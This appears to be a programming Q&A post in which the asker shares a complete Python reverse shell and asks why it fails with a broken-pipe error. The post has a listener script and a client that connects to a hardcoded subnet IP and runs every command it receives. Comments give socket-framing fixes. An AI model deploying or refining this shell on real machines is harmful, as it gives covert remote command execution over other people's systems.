# python 3 reverse shell broken pipe linux

Tags: python, subprocess

I have an issue regarding a python reverse shell I made.

I always get `Error 32: broken pipe` every time I test it on some other computer on my subnet.

Server-side code:

```
import socket
SERVER_HOST = ""
SERVER_PORT = 9998
# send 1024 (1kb) a time (as buffer size)
BUFFER_SIZE = 1024
# create a socket object
s = socket.socket()

# bind the socket to all IP addresses of this host
s.bind((SERVER_HOST, SERVER_PORT))
s.listen(5)
print(f"Listening as {SERVER_HOST}:{SERVER_PORT} ...")
client_socket, client_address = s.accept()
print(f"{client_address[0]}:{client_address[1]} Connected!")
while True:
    # get the command from prompt
    command = input("Enter the command you wanna execute:")
    # send the command to the client
    client_socket.send(command.encode())
    if command.lower() == "exit":
        # if the command is exit, just break out of the loop
        break
    # retrieve command results
    results = client_socket.recv(BUFFER_SIZE).decode()
    # print them
    print(results)
# close connection to the client
client_socket.close()
# close server connection
s.close()
```

And this is the Client-side code

```
import socket
import subprocess
import sys,errno

host = "10.0.0.152"
port = 9998
BUFFER_SIZE = 1024
s = socket.socket()
# connect to the server
s.connect((host, port))
s = socket.socket()
# connect to the server
s.connect((host, port))
while True:
    # receive the command from the server
    command = s.recv(BUFFER_SIZE).decode()
    if command.lower() == "exit":
        # if the command is exit, just break out of the loop
        break
    # execute the command and retrieve the results
    output = subprocess.getoutput(command)
    # send the results back to the server
    s.send(output.encode())
# close client connection
s.close
```

I do not think it is a syntax error because it works on my computer if I launch server and client.

Comment: Sending and receiving strings over sockets without encapsulation (e.g. https://en.wikipedia.org/wiki/Netstring or some TLV scheme - https://en.wikipedia.org/wiki/Type-length-value) will not work correctly when the strings are sufficiently large. Besides, you should use `.sendall()` if you want to ensure everything is sent out.

Comment: In addition, the client code connects to the server twice for no reason.

Comment: Please include the code you are asking about *in the question*, formatted as a code sample. When those paste links expire, this question becomes useless to people in the future who may have the same or similar question.